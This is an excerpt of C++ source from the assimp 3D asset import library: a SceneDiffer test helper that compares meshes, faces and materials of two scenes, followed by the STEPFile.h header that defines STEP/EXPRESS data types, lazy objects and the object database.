written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
---------------------------------------------------------------------------
*/
#include "SceneDiffer.h"
#include <assimp/scene.h>
#include <assimp/mesh.h>
#include <assimp/material.h>
#include <sstream>
namespace Assimp {
SceneDiffer::SceneDiffer()
: m_diffs() {
// empty
}
SceneDiffer::~SceneDiffer() {
// empty
}
bool SceneDiffer::isEqual( const aiScene *expected, const aiScene *toCompare ) {
if ( expected == toCompare ) {
return true;
}
if ( nullptr == expected ) {
return false;
}
if ( nullptr == toCompare ) {
return false;
}
// meshes
if ( expected->mNumMeshes != toCompare->mNumMeshes ) {
std::stringstream stream;
stream << "Number of meshes not equal ( expected: " << expected->mNumMeshes << ", found : " << toCompare->mNumMeshes << " )\n";
addDiff( stream.str() );
return false;
}
for ( unsigned int i = 0; i < expected->mNumMeshes; i++ ) {
aiMesh *expMesh( expected->mMeshes[ i ] );
aiMesh *toCompMesh( toCompare->mMeshes[ i ] );
if ( !compareMesh( expMesh, toCompMesh ) ) {
std::stringstream stream;
stream << "Meshes are not equal, index : " << i << "\n";
addDiff( stream.str() );
}
}
// ToDo!
return true;
// materials
if ( expected->mNumMaterials != toCompare->mNumMaterials ) {
std::stringstream stream;
stream << "Number of materials not equal ( expected: " << expected->mNumMaterials << ", found : " << toCompare->mNumMaterials << " )\n";
addDiff( stream.str() );
return false;
}
if ( expected->mNumMaterials > 0 ) {
if ( nullptr == expected->mMaterials || nullptr == toCompare->mMaterials ) {
addDiff( "Number of materials > 0 and mat pointer is nullptr" );
return false;
}
}
for ( unsigned int i = 0; i < expected->mNumMaterials; i++ ) {
aiMaterial *expectedMat( expected->mMaterials[ i ] );
aiMaterial *toCompareMat( expected->mMaterials[ i ] );
if ( !compareMaterial( expectedMat, toCompareMat ) ) {
std::stringstream stream;
stream << "Materials are not equal, index : " << i << "\n";
addDiff( stream.str() );
}
}
return true;
}
void SceneDiffer::showReport() {
if ( m_diffs.empty() ) {
return;
}
for ( std::vector<std::string>::iterator it = m_diffs.begin(); it != m_diffs.end(); it++ ) {
std::cout << *it << "\n";
}
std::cout << std::endl;
}
void SceneDiffer::reset() {
m_diffs.resize( 0 );
}
void SceneDiffer::addDiff( const std::string &diff ) {
if ( diff.empty() ) {
return;
}
m_diffs.push_back( diff );
}
static std::string dumpVector3( const aiVector3D &toDump ) {
std::stringstream stream;
stream << "( " << toDump.x << ", " << toDump.y << ", " << toDump.z << ")";
return stream.str();
}
/*static std::string dumpColor4D( const aiColor4D &toDump ) {
std::stringstream stream;
stream << "( " << toDump.r << ", " << toDump.g << ", " << toDump.b << ", " << toDump.a << ")";
return stream.str();
}*/
static std::string dumpFace( const aiFace &face ) {
std::stringstream stream;
for ( unsigned int i = 0; i < face.mNumIndices; i++ ) {
stream << face.mIndices[ i ];
if ( i < face.mNumIndices - 1 ) {
stream << ", ";
}
else {
stream << "\n";
}
}
return stream.str();
}
bool SceneDiffer::compareMesh( aiMesh *expected, aiMesh *toCompare ) {
if ( expected == toCompare ) {
return true;
}
if ( nullptr == expected || nullptr == toCompare ) {
return false;
}
if ( expected->mName != toCompare->mName ) {
std::stringstream stream;
stream << "Mesh name not equal ( expected: " << expected->mName.C_Str() << ", found : " << toCompare->mName.C_Str() << " )\n";
addDiff( stream.str() );
}
if ( expected->mNumVertices != toCompare->mNumVertices ) {
std::stringstream stream;
stream << "Number of vertices not equal ( expected: " << expected->mNumVertices << ", found : " << toCompare->mNumVertices << " )\n";
addDiff( stream.str() );
return false;
}
// positions
if ( expected->HasPositions() != toCompare->HasPositions() ) {
addDiff( "Expected are vertices, toCompare does not have any." );
return false;
}
bool vertEqual( true );
for ( unsigned int i = 0; i < expected->mNumVertices; i++ ) {
aiVector3D &expVert( expected->mVertices[ i ] );
aiVector3D &toCompVert( toCompare->mVertices[ i ] );
if ( !expVert.Equal( toCompVert ) ) {
std::cout << "index = " << i << dumpVector3( toCompVert ) << "\n";
std::stringstream stream;
stream << "Vertex not equal ( expected: " << dumpVector3( toCompVert ) << ", found: " << dumpVector3( toCompVert ) << "\n";
addDiff( stream.str() );
vertEqual = false;
}
}
if ( !vertEqual ) {
return false;
}
// normals
if ( expected->HasNormals() != toCompare->HasNormals() ) {
addDiff( "Expected are normals, toCompare does not have any." );
return false;
}
// return true;
//ToDo!
/*bool normalEqual( true );
for ( unsigned int i = 0; i < expected->mNumVertices; i++ ) {
aiVector3D &expNormal( expected->mNormals[ i ] );
aiVector3D &toCompNormal( toCompare->mNormals[ i ] );
if ( expNormal.Equal( toCompNormal ) ) {
std::stringstream stream;
stream << "Normal not equal ( expected: " << dumpVector3( expNormal ) << ", found: " << dumpVector3( toCompNormal ) << "\n";
addDiff( stream.str() );
normalEqual = false;
}
}
if ( !normalEqual ) {
return false;
}
// vertex colors
bool vertColEqual( true );
for ( unsigned int a = 0; a < AI_MAX_NUMBER_OF_COLOR_SETS; a++ ) {
if ( expected->HasVertexColors(a) != toCompare->HasVertexColors(a) ) {
addDiff( "Expected are normals, toCompare does not have any." );
return false;
}
for ( unsigned int i = 0; i < expected->mNumVertices; i++ ) {
aiColor4D &expColor4D( expected->mColors[ a ][ i ] );
aiColor4D &toCompColor4D( toCompare->mColors[ a ][ i ] );
if ( expColor4D != toCompColor4D ) {
std::stringstream stream;
stream << "Color4D not equal ( expected: " << dumpColor4D( expColor4D ) << ", found: " << dumpColor4D( toCompColor4D ) << "\n";
addDiff( stream.str() );
vertColEqual = false;
}
}
if ( !vertColEqual ) {
return false;
}
}
// texture coords
bool texCoordsEqual( true );
for ( unsigned int a = 0; a < AI_MAX_NUMBER_OF_TEXTURECOORDS; a++ ) {
if ( expected->HasTextureCoords( a ) != toCompare->HasTextureCoords( a ) ) {
addDiff( "Expected are texture coords, toCompare does not have any." );
return false;
}
for ( unsigned int i = 0; i < expected->mNumVertices; i++ ) {
aiVector3D &expTexCoord( expected->mTextureCoords[ a ][ i ] );
aiVector3D &toCompTexCoord( toCompare->mTextureCoords[ a ][ i ] );
if ( expTexCoord.Equal( toCompTexCoord ) ) {
std::stringstream stream;
stream << "Texture coords not equal ( expected: " << dumpVector3( expTexCoord ) << ", found: " << dumpVector3( toCompTexCoord ) << "\n";
addDiff( stream.str() );
vertColEqual = false;
}
}
if ( !vertColEqual ) {
return false;
}
}
// tangents and bi-tangents
if ( expected->HasTangentsAndBitangents() != toCompare->HasTangentsAndBitangents() ) {
addDiff( "Expected are tangents and bi-tangents, toCompare does not have any." );
return false;
}
bool tangentsEqual( true );
for ( unsigned int i = 0; i < expected->mNumVertices; i++ ) {
aiVector3D &expTangents( expected->mTangents[ i ] );
aiVector3D &toCompTangents( toCompare->mTangents[ i ] );
if ( expTangents.Equal( toCompTangents ) ) {
std::stringstream stream;
stream << "Tangents not equal ( expected: " << dumpVector3( expTangents ) << ", found: " << dumpVector3( toCompTangents ) << "\n";
addDiff( stream.str() );
tangentsEqual = false;
}
aiVector3D &expBiTangents( expected->mBitangents[ i ] );
aiVector3D &toCompBiTangents( toCompare->mBitangents[ i ] );
if ( expBiTangents.Equal( toCompBiTangents ) ) {
std::stringstream stream;
stream << "Tangents not equal ( expected: " << dumpVector3( expBiTangents ) << ", found: " << dumpVector3( toCompBiTangents ) << " )\n";
addDiff( stream.str() );
tangentsEqual = false;
}
}
if ( !tangentsEqual ) {
return false;
}*/
// faces
if ( expected->mNumFaces != toCompare->mNumFaces ) {
std::stringstream stream;
stream << "Number of faces are not equal, ( expected: " << expected->mNumFaces << ", found: " << toCompare->mNumFaces << ")\n";
addDiff( stream.str() );
return false;
}
bool facesEqual( true );
for ( unsigned int i = 0; i < expected->mNumFaces; i++ ) {
aiFace &expFace( expected->mFaces[ i ] );
aiFace &toCompareFace( toCompare->mFaces[ i ] );
if ( !compareFace( &expFace, &toCompareFace ) ) {
addDiff( "Faces are not equal\n" );
addDiff( dumpFace( expFace ) );
addDiff( dumpFace( toCompareFace ) );
facesEqual = false;
}
}
if ( !facesEqual ) {
return false;
}
return true;
}
bool SceneDiffer::compareFace( aiFace *expected, aiFace *toCompare ) {
if ( nullptr == expected ) {
return false;
}
if ( nullptr == toCompare ) {
return false;
}
// same instance
if ( expected == toCompare ) {
return true;
}
// using compare operator
if ( *expected == *toCompare ) {
return true;
}
return false;
}
bool SceneDiffer::compareMaterial( aiMaterial *expected, aiMaterial *toCompare ) {
if ( nullptr == expected ) {
return false;
}
if ( nullptr == toCompare ) {
return false;
}
// same instance
if ( expected == toCompare ) {
return true;
}
// todo!
return true;
}
}
<|start_filename|>assimp/code/STEPFile.h<|end_filename|>
/*
Open Asset Import Library (assimp)
----------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the
following conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
----------------------------------------------------------------------
*/
#ifndef INCLUDED_AI_STEPFILE_H
#define INCLUDED_AI_STEPFILE_H
#include <bitset>
#include <memory>
#include <typeinfo>
#include <vector>
#include <map>
#include <set>
#include "FBXDocument.h" //ObjectMap::value_type
#include <assimp/DefaultLogger.hpp>
//
#if _MSC_VER > 1500 || (defined __GNUC___)
# define ASSIMP_STEP_USE_UNORDERED_MULTIMAP
# else
# define step_unordered_map map
# define step_unordered_multimap multimap
#endif
#ifdef ASSIMP_STEP_USE_UNORDERED_MULTIMAP
# include <unordered_map>
# if _MSC_VER > 1600
# define step_unordered_map unordered_map
# define step_unordered_multimap unordered_multimap
# else
# define step_unordered_map tr1::unordered_map
# define step_unordered_multimap tr1::unordered_multimap
# endif
#endif
#include "LineSplitter.h"
// uncomment this to have the loader evaluate all entities upon loading.
// this is intended as stress test - by default, entities are evaluated
// lazily and therefore not unless needed.
//#define ASSIMP_IFC_TEST
namespace Assimp {
// ********************************************************************************
// before things get complicated, this is the basic outline:
namespace STEP {
namespace EXPRESS {
// base data types known by EXPRESS schemata - any custom data types will derive one of those
class DataType;
class UNSET; /*: public DataType */
class ISDERIVED; /*: public DataType */
// class REAL; /*: public DataType */
class ENUM; /*: public DataType */
// class STRING; /*: public DataType */
// class INTEGER; /*: public DataType */
class ENTITY; /*: public DataType */
class LIST; /*: public DataType */
// class SELECT; /*: public DataType */
// a conversion schema is not exactly an EXPRESS schema, rather it
// is a list of pointers to conversion functions to build up the
// object tree from an input file.
class ConversionSchema;
}
struct HeaderInfo;
class Object;
class LazyObject;
class DB;
typedef Object* (*ConvertObjectProc)(const DB& db, const EXPRESS::LIST& params);
}
// ********************************************************************************
namespace STEP {
// -------------------------------------------------------------------------------
/** Exception class used by the STEP loading & parsing code. It is typically
* coupled with a line number. */
// -------------------------------------------------------------------------------
struct SyntaxError : DeadlyImportError {
enum {
LINE_NOT_SPECIFIED = 0xffffffffffffffffLL
};
SyntaxError (const std::string& s,uint64_t line = LINE_NOT_SPECIFIED);
};
// -------------------------------------------------------------------------------
/** Exception class used by the STEP loading & parsing code when a type
* error (i.e. an entity expects a string but receives a bool) occurs.
* It is typically coupled with both an entity id and a line number.*/
// -------------------------------------------------------------------------------
struct TypeError : DeadlyImportError
{
enum {
ENTITY_NOT_SPECIFIED = 0xffffffffffffffffLL
};
TypeError (const std::string& s,uint64_t entity = ENTITY_NOT_SPECIFIED, uint64_t line = SyntaxError::LINE_NOT_SPECIFIED);
};
// hack to make a given member template-dependent
template <typename T, typename T2>
T2& Couple(T2& in) {
return in;
}
namespace EXPRESS {
// -------------------------------------------------------------------------------
//** Base class for all STEP data types */
// -------------------------------------------------------------------------------
class DataType
{
public:
typedef std::shared_ptr<const DataType> Out;
public:
virtual ~DataType() {
}
public:
template <typename T>
const T& To() const {
return dynamic_cast<const T&>(*this);
}
template <typename T>
T& To() {
return dynamic_cast<T&>(*this);
}
template <typename T>
const T* ToPtr() const {
return dynamic_cast<const T*>(this);
}
template <typename T>
T* ToPtr() {
return dynamic_cast<T*>(this);
}
// utilities to deal with SELECT entities, which currently lack automatic
// conversion support.
template <typename T>
const T& ResolveSelect(const DB& db) const {
return Couple<T>(db).MustGetObject(To<EXPRESS::ENTITY>())->template To<T>();
}
template <typename T>
const T* ResolveSelectPtr(const DB& db) const {
const EXPRESS::ENTITY* e = ToPtr<EXPRESS::ENTITY>();
return e?Couple<T>(db).MustGetObject(*e)->template ToPtr<T>():(const T*)0;
}
public:
/** parse a variable from a string and set 'inout' to the character
* behind the last consumed character. An optional schema enables,
* if specified, automatic conversion of custom data types.
*
* @throw SyntaxError
*/
static std::shared_ptr<const EXPRESS::DataType> Parse(const char*& inout,
uint64_t line = SyntaxError::LINE_NOT_SPECIFIED,
const EXPRESS::ConversionSchema* schema = NULL);
public:
};
typedef DataType SELECT;
typedef DataType LOGICAL;
// -------------------------------------------------------------------------------
/** Sentinel class to represent explicitly unset (optional) fields ($) */
// -------------------------------------------------------------------------------
class UNSET : public DataType
{
public:
private:
};
// -------------------------------------------------------------------------------
/** Sentinel class to represent explicitly derived fields (*) */
// -------------------------------------------------------------------------------
class ISDERIVED : public DataType
{
public:
private:
};
// -------------------------------------------------------------------------------
/** Shared implementation for some of the primitive data type, i.e. int, float */
// -------------------------------------------------------------------------------
template <typename T>
class PrimitiveDataType : public DataType
{
public:
// This is the type that will cd ultimatively be used to
// expose this data type to the user.
typedef T Out;
public:
PrimitiveDataType() {}
PrimitiveDataType(const T& val)
: val(val)
{}
PrimitiveDataType(const PrimitiveDataType& o) {
(*this) = o;
}
public:
operator const T& () const {
return val;
}
PrimitiveDataType& operator=(const PrimitiveDataType& o) {
val = o.val;
return *this;
}
protected:
T val;
};
typedef PrimitiveDataType<int64_t> INTEGER;
typedef PrimitiveDataType<double> REAL;
typedef PrimitiveDataType<double> NUMBER;
typedef PrimitiveDataType<std::string> STRING;
// -------------------------------------------------------------------------------
/** Generic base class for all enumerated types */
// -------------------------------------------------------------------------------
class ENUMERATION : public STRING
{
public:
ENUMERATION (const std::string& val)
: STRING(val)
{}
private:
};
typedef ENUMERATION BOOLEAN;
// -------------------------------------------------------------------------------
/** This is just a reference to an entity/object somewhere else */
// -------------------------------------------------------------------------------
class ENTITY : public PrimitiveDataType<uint64_t>
{
public:
ENTITY(uint64_t val)
: PrimitiveDataType<uint64_t>(val)
{
ai_assert(val!=0);
}
ENTITY()
: PrimitiveDataType<uint64_t>(TypeError::ENTITY_NOT_SPECIFIED)
{
}
private:
};
// -------------------------------------------------------------------------------
/** Wrap any STEP aggregate: LIST, SET, ... */
// -------------------------------------------------------------------------------
class LIST : public DataType
{
public:
// access a particular list index, throw std::range_error for wrong indices
std::shared_ptr<const DataType> operator[] (size_t index) const {
return members[index];
}
size_t GetSize() const {
return members.size();
}
public:
/** @see DaraType::Parse */
static std::shared_ptr<const EXPRESS::LIST> Parse(const char*& inout,
uint64_t line = SyntaxError::LINE_NOT_SPECIFIED,
const EXPRESS::ConversionSchema* schema = NULL);
private:
typedef std::vector< std::shared_ptr<const DataType> > MemberList;
MemberList members;
};
// -------------------------------------------------------------------------------
/* Not exactly a full EXPRESS schema but rather a list of conversion functions
* to extract valid C++ objects out of a STEP file. Those conversion functions
* may, however, perform further schema validations. */
// -------------------------------------------------------------------------------
class ConversionSchema
{
public:
struct SchemaEntry {
SchemaEntry(const char* name,ConvertObjectProc func)
: name(name)
, func(func)
{}
const char* name;
ConvertObjectProc func;
};
typedef std::map<std::string,ConvertObjectProc> ConverterMap;
public:
template <size_t N>
explicit ConversionSchema( const SchemaEntry (& schemas)[N]) {
*this = schemas;
}
ConversionSchema() {}
public:
ConvertObjectProc GetConverterProc(const std::string& name) const {
ConverterMap::const_iterator it = converters.find(name);
return it == converters.end() ? NULL : (*it).second;
}
bool IsKnownToken(const std::string& name) const {
return converters.find(name) != converters.end();
}
const char* GetStaticStringForToken(const std::string& token) const {
ConverterMap::const_iterator it = converters.find(token);
return it == converters.end() ? NULL : (*it).first.c_str();
}
template <size_t N>
const ConversionSchema& operator=( const SchemaEntry (& schemas)[N]) {
for(size_t i = 0; i < N; ++i ) {
const SchemaEntry& schema = schemas[i];
converters[schema.name] = schema.func;
}
return *this;
}
private:
ConverterMap converters;
};
}
// ------------------------------------------------------------------------------
/** Bundle all the relevant info from a STEP header, parts of which may later
* be plainly dumped to the logfile, whereas others may help the caller pick an
* appropriate loading strategy.*/
// ------------------------------------------------------------------------------
struct HeaderInfo
{
std::string timestamp;
std::string app;
std::string fileSchema;
};
// ------------------------------------------------------------------------------
/** Base class for all concrete object instances */
// ------------------------------------------------------------------------------
class Object
{
public:
virtual ~Object() {}
Object(const char* classname = "unknown")
: classname(classname) {}
public:
// utilities to simplify casting to concrete types
template <typename T>
const T& To() const {
return dynamic_cast<const T&>(*this);
}
template <typename T>
T& To() {
return dynamic_cast<T&>(*this);
}
template <typename T>
const T* ToPtr() const {
return dynamic_cast<const T*>(this);
}
template <typename T>
T* ToPtr() {
return dynamic_cast<T*>(this);
}
public:
uint64_t GetID() const {
return id;
}
std::string GetClassName() const {
return classname;
}
void SetID(uint64_t newval) {
id = newval;
}
private:
uint64_t id;
const char* const classname;
};
template <typename T>
size_t GenericFill(const STEP::DB& db, const EXPRESS::LIST& params, T* in);
// (intentionally undefined)
// ------------------------------------------------------------------------------
/** CRTP shared base class for use by concrete entity implementation classes */
// ------------------------------------------------------------------------------
template <typename TDerived, size_t arg_count>
struct ObjectHelper : virtual Object
{
ObjectHelper() : aux_is_derived(0) {}
static Object* Construct(const STEP::DB& db, const EXPRESS::LIST& params) {
// make sure we don't leak if Fill() throws an exception
std::unique_ptr<TDerived> impl(new TDerived());
// GenericFill<T> is undefined so we need to have a specialization
const size_t num_args = GenericFill<TDerived>(db,params,&*impl);
(void)num_args;
// the following check is commented because it will always trigger if
// parts of the entities are generated with dummy wrapper code.
// This is currently done to reduce the size of the loader
// code.
//if (num_args != params.GetSize() && impl->GetClassName() != "NotImplemented") {
// DefaultLogger::get()->debug("STEP: not all parameters consumed");
//}
return impl.release();
}
// note that this member always exists multiple times within the hierarchy
// of an individual object, so any access to it must be disambiguated.
std::bitset<arg_count> aux_is_derived;
};
// ------------------------------------------------------------------------------
/** Class template used to represent OPTIONAL data members in the converted schema */
// ------------------------------------------------------------------------------
template <typename T>
struct Maybe
{
Maybe() : have() {}
explicit Maybe(const T& ptr) : ptr(ptr), have(true) {
}
void flag_invalid() {
have = false;
}
void flag_valid() {
have = true;
}
bool operator! () const {
return !have;
}
operator bool() const {
return have;
}
operator const T&() const {
return Get();
}
const T& Get() const {
ai_assert(have);
return ptr;
}
Maybe& operator=(const T& _ptr) {
ptr = _ptr;
have = true;
return *this;
}
private:
template <typename T2> friend struct InternGenericConvert;
operator T&() {
return ptr;
}
T ptr;
bool have;
};
// ------------------------------------------------------------------------------
/** A LazyObject is created when needed. Before this happens, we just keep
the text line that contains the object definition. */
// -------------------------------------------------------------------------------
class LazyObject
{
friend class DB;
public:
LazyObject(DB& db, uint64_t id, uint64_t line, const char* type,const char* args);
~LazyObject();
public:
Object& operator * () {
if (!obj) {
LazyInit();
ai_assert(obj);
}
return *obj;
}
const Object& operator * () const {
if (!obj) {
LazyInit();
ai_assert(obj);
}
return *obj;
}
template <typename T>
const T& To() const {
return dynamic_cast<const T&>( **this );
}
template <typename T>
T& To() {
return dynamic_cast<T&>( **this );
}
template <typename T>
const T* ToPtr() const {
return dynamic_cast<const T*>( &**this );
}
template <typename T>
T* ToPtr() {
return dynamic_cast<T*>( &**this );
}
Object* operator -> () {
return &**this;
}
const Object* operator -> () const {
return &**this;
}
bool operator== (const std::string& atype) const {
return type == atype;
}
bool operator!= (const std::string& atype) const {
return type != atype;
}
uint64_t GetID() const {
return id;
}
private:
void LazyInit() const;
private:
mutable uint64_t id;
const char* const type;
DB& db;
mutable const char* args;
mutable Object* obj;
};
template <typename T>
inline bool operator==( std::shared_ptr<LazyObject> lo, T whatever ) {
return *lo == whatever; // XXX use std::forward if we have 0x
}
template <typename T>
inline bool operator==( const std::pair<uint64_t, std::shared_ptr<LazyObject> >& lo, T whatever ) {
return *(lo.second) == whatever; // XXX use std::forward if we have 0x
}
// ------------------------------------------------------------------------------
/** Class template used to represent lazily evaluated object references in the converted schema */
// ------------------------------------------------------------------------------
template <typename T>
struct Lazy
{
typedef Lazy Out;
Lazy(const LazyObject* obj = NULL) : obj(obj) {
}
operator const T*() const {
return obj->ToPtr<T>();
}
operator const T&() const {
return obj->To<T>();
}
const T& operator * () const {
return obj->To<T>();
}
const T* operator -> () const {
return &obj->To<T>();
}
const LazyObject* obj;
};
// ------------------------------------------------------------------------------
/** Class template used to represent LIST and SET data members in the converted schema */
// ------------------------------------------------------------------------------
template <typename T, uint64_t min_cnt, uint64_t max_cnt=0uL>
struct ListOf : public std::vector<typename T::Out>
{
typedef typename T::Out OutScalar;
typedef ListOf Out;
ListOf() {
static_assert(min_cnt <= max_cnt || !max_cnt, "min_cnt <= max_cnt || !max_cnt");
}
};
// ------------------------------------------------------------------------------
template <typename TOut>
struct PickBaseType {
typedef EXPRESS::PrimitiveDataType<TOut> Type;
};
template <typename TOut>
struct PickBaseType< Lazy<TOut> > {
typedef EXPRESS::ENTITY Type;
};
template <> struct PickBaseType< std::shared_ptr< const EXPRESS::DataType > >;
// ------------------------------------------------------------------------------
template <typename T>
struct InternGenericConvert {
void operator()(T& out, const std::shared_ptr< const EXPRESS::DataType >& in, const STEP::DB& /*db*/) {
try{
out = dynamic_cast< const typename PickBaseType<T>::Type& > ( *in );
}
catch(std::bad_cast&) {
throw TypeError("type error reading literal field");
}
}
};
template <>
struct InternGenericConvert< std::shared_ptr< const EXPRESS::DataType > > {
void operator()(std::shared_ptr< const EXPRESS::DataType >& out, const std::shared_ptr< const EXPRESS::DataType >& in, const STEP::DB& /*db*/) {
out = in;
}
};
template <typename T>
struct InternGenericConvert< Maybe<T> > {
void operator()(Maybe<T>& out, const std::shared_ptr< const EXPRESS::DataType >& in, const STEP::DB& db) {
GenericConvert((T&)out,in,db);
out.flag_valid();
}
};
template <typename T,uint64_t min_cnt, uint64_t max_cnt>
struct InternGenericConvertList {
void operator()(ListOf<T, min_cnt, max_cnt>& out, const std::shared_ptr< const EXPRESS::DataType >& inp_base, const STEP::DB& db) {
const EXPRESS::LIST* inp = dynamic_cast<const EXPRESS::LIST*>(inp_base.get());
if (!inp) {
throw TypeError("type error reading aggregate");
}
// XXX is this really how the EXPRESS notation ([?:3],[1:3]) is intended?
if (max_cnt && inp->GetSize() > max_cnt) {
DefaultLogger::get()->warn("too many aggregate elements");
}
else if (inp->GetSize() < min_cnt) {
DefaultLogger::get()->warn("too few aggregate elements");
}
out.reserve(inp->GetSize());
for(size_t i = 0; i < inp->GetSize(); ++i) {
out.push_back( typename ListOf<T, min_cnt, max_cnt>::OutScalar() );
try{
GenericConvert(out.back(),(*inp)[i], db);
}
catch(const TypeError& t) {
throw TypeError(t.what() +std::string(" of aggregate"));
}
}
}
};
template <typename T>
struct InternGenericConvert< Lazy<T> > {
void operator()(Lazy<T>& out, const std::shared_ptr< const EXPRESS::DataType >& in_base, const STEP::DB& db) {
const EXPRESS::ENTITY* in = dynamic_cast<const EXPRESS::ENTITY*>(in_base.get());
if (!in) {
throw TypeError("type error reading entity");
}
out = Couple<T>(db).GetObject(*in);
}
};
template <typename T1>
inline void GenericConvert(T1& a, const std::shared_ptr< const EXPRESS::DataType >& b, const STEP::DB& db) {
return InternGenericConvert<T1>()(a,b,db);
}
template <typename T1,uint64_t N1, uint64_t N2>
inline void GenericConvert(ListOf<T1,N1,N2>& a, const std::shared_ptr< const EXPRESS::DataType >& b, const STEP::DB& db) {
return InternGenericConvertList<T1,N1,N2>()(a,b,db);
}
// ------------------------------------------------------------------------------
/** Lightweight manager class that holds the map of all objects in a
* STEP file. DB's are exclusively maintained by the functions in
* STEPFileReader.h*/
// -------------------------------------------------------------------------------
class DB
{
friend DB* ReadFileHeader(std::shared_ptr<IOStream> stream);
friend void ReadFile(DB& db,const EXPRESS::ConversionSchema& scheme,
const char* const* types_to_track, size_t len,
const char* const* inverse_indices_to_track, size_t len2
);
friend class LazyObject;
public:
// objects indexed by ID - this can grow pretty large (i.e some hundred million
// entries), so use raw pointers to avoid *any* overhead.
typedef std::map<uint64_t,const LazyObject* > ObjectMap;
// objects indexed by their declarative type, but only for those that we truly want
typedef std::set< const LazyObject*> ObjectSet;
typedef std::map<std::string, ObjectSet > ObjectMapByType;
// list of types for which to keep inverse indices for all references
// that the respective objects keep.
// the list keeps pointers to strings in static storage
typedef std::set<const char*> InverseWhitelist;
// references - for each object id the ids of all objects which reference it
// this is used to simulate STEP inverse indices for selected types.
typedef std::step_unordered_multimap<uint64_t, uint64_t > RefMap;
typedef std::pair<RefMap::const_iterator,RefMap::const_iterator> RefMapRange;
private:
DB(std::shared_ptr<StreamReaderLE> reader)
: reader(reader)
, splitter(*reader,true,true)
, evaluated_count()
, schema( NULL )
{}
public:
~DB() {
for(ObjectMap::value_type& o : objects) {
delete o.second;
}
}
public:
uint64_t GetObjectCount() const {
return objects.size();
}
uint64_t GetEvaluatedObjectCount() const {
return evaluated_count;
}
const HeaderInfo& GetHeader() const {
return header;
}
const EXPRESS::ConversionSchema& GetSchema() const {
return *schema;
}
const ObjectMap& GetObjects() const {
return objects;
}
const ObjectMapByType& GetObjectsByType() const {
return objects_bytype;
}
const RefMap& GetRefs() const {
return refs;
}
bool KeepInverseIndicesForType(const char* const type) const {
return inv_whitelist.find(type) != inv_whitelist.end();
}
// get the yet unevaluated object record with a given id
const LazyObject* GetObject(uint64_t id) const {
const ObjectMap::const_iterator it = objects.find(id);
if (it != objects.end()) {
return (*it).second;
}
return NULL;
}
// get an arbitrary object out of the soup with the only restriction being its type.
const LazyObject* GetObject(const std::string& type) const {
const ObjectMapByType::const_iterator it = objects_bytype.find(type);
if (it != objects_bytype.end() && (*it).second.size()) {
return *(*it).second.begin();
}
return NULL;
}
// same, but raise an exception if the object doesn't exist and return a reference
const LazyObject& MustGetObject(uint64_t id) const {
const LazyObject* o = GetObject(id);
if (!o) {
throw TypeError("requested entity is not present",id);
}
return *o;
}
const LazyObject& MustGetObject(const std::string& type) const {
const LazyObject* o = GetObject(type);
if (!o) {
throw TypeError("requested entity of type "+type+"is not present");
}
return *o;
}
#ifdef ASSIMP_IFC_TEST
// evaluate *all* entities in the file. this is a power test for the loader
void EvaluateAll() {
for(ObjectMap::value_type& e :objects) {
**e.second;
}
ai_assert(evaluated_count == objects.size());
}
#endif
private:
// full access only offered to close friends - they should
// use the provided getters rather than messing around with
// the members directly.
LineSplitter& GetSplitter() {
return splitter;
}
void InternInsert(const LazyObject* lz) {
objects[lz->GetID()] = lz;
const ObjectMapByType::iterator it = objects_bytype.find( lz->type );
if (it != objects_bytype.end()) {
(*it).second.insert(lz);
}
}
void SetSchema(const EXPRESS::ConversionSchema& _schema) {
schema = &_schema;
}
void SetTypesToTrack(const char* const* types, size_t N) {
for(size_t i = 0; i < N;++i) {
objects_bytype[types[i]] = ObjectSet();
}
}
void SetInverseIndicesToTrack( const char* const* types, size_t N ) {
for(size_t i = 0; i < N;++i) {
const char* const sz = schema->GetStaticStringForToken(types[i]);
ai_assert(sz);
inv_whitelist.insert(sz);
}
}
HeaderInfo& GetHeader() {
return header;
}
void MarkRef(uint64_t who, uint64_t by_whom) {
refs.insert(std::make_pair(who,by_whom));
}
private:
HeaderInfo header;
ObjectMap objects;
ObjectMapByType objects_bytype;
RefMap refs;
InverseWhitelist inv_whitelist;
